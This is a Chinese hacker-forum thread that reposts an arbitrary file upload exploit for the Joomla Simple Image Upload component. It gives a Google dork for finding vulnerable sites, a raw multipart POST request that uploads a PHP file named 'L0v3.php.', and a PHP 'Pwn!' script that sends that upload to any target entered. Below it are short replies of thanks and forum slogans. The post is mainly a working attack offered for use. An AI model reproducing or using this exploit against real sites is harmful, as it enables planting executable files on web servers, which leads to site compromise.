社区首页 › 漏洞情报 › Joomla SimpleImageUpload任意文件上传

90_ 发表于 2015-6-26 19:32:58

Joomla SimpleImageUpload任意文件上传

# Exploit Title: Joomla Simple Image Upload - Arbitrary File Upload
# Google Dork: inurl:option=com_simpleimageupload
# Date: 23.06.2015
# Version: 1.0
# Tested on: MsWin32
 
# Vuln Same to Com_Media Vulnerability
 
# Live Request :
 
POST /index.php?option=com_simpleimageupload&view=upload&tmpl=component&e_name=desc HTTP/1.1
 
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.unhonker.com/index.php?option=com_simpleimageupload&view=upload&tmpl=component&e_name=desc
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------247062787817068
 
 
-----------------------------247062787817068\r\n
Content-Disposition: form-data; name="Filedata"; filename="L0v3.php."\r\n
Content-Type: application/x-php\r\n
\r\n
0wn3d ! ;)\r\n
-----------------------------247062787817068\r\n
Content-Disposition: form-data; name="return-url"\r\n
\r\n
aW5kZXgucGhwP29wdGlvbj1jb21fc2ltcGxlaW1hZ2V1cGxvYWQmdmlldz11cGxvYWQmdG1wbD1jb21wb25lbnQmZV9uYW1lPWRlc2M=\r\n
-----------------------------247062787817068--\r\n
 
 
# Exploit :
 
<?php
 
echo '<form action="#"  method="post" enctype="multipart/form-data">
<input type="text" name="target" value="www.localhost.com" /><input type="submit" name="Pwn" value="Pwn!" />
</form>';
 
 
if($_POST) {
     
    $target = $_POST['target'];
 
$file = "0wn3d ! ;)";
$header = array("Content-Type: application/x-php",
"Content-Disposition: form-data; name=\"Filedata\"; file=\"L0v3.php.\"");
 
$ch = curl_init("http://".$target."/index.php?option=com_simpleimageupload&task=upload.upload&tmpl=component");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.124 Safari/537.36");
curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$file", "return-url" => "aW5kZXgucGhwP29wdGlvbj1jb21fc2ltcGxlaW1hZ2V1cGxvYWQmdmlldz11cGxvYWQmdG1wbD1jb21wb25lbnQmZV9uYW1lPWRlc2M=",));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPHEADER, $header);
$result = curl_exec($ch);
curl_close($ch);
print "$result";
 
} else { die(); }
?>
 
 
# Path of File : 127.0.0.1/images/L0v3.php
# Sh00t to Mr_AnarShi-T;

fireworld 发表于 2015-6-26 22:19:22

支持中国红客联盟(ihonker.org)

cl476874045 发表于 2015-6-27 11:53:04

加油！干倒冰儿和酒仙！

小龙 发表于 2015-6-27 14:16:41

加油！干倒冰儿和酒仙！

ruguoruo 发表于 2015-6-27 15:30:26

感谢楼主的分享~

ruguoruo 发表于 2015-6-27 18:19:03

支持中国红客联盟(ihonker.org)

云游者 发表于 2015-6-28 19:47:40

感谢楼主的分享~

54hacker 发表于 2015-6-29 11:35:02

学习学习技术，加油！

H.U.C-麦麦 发表于 2015-6-29 17:14:43

支持中国红客联盟(ihonker.org)

ayang 发表于 2015-6-30 00:42:24

支持中国红客联盟(ihonker.org)

查看完整版本: Joomla SimpleImageUpload任意文件上传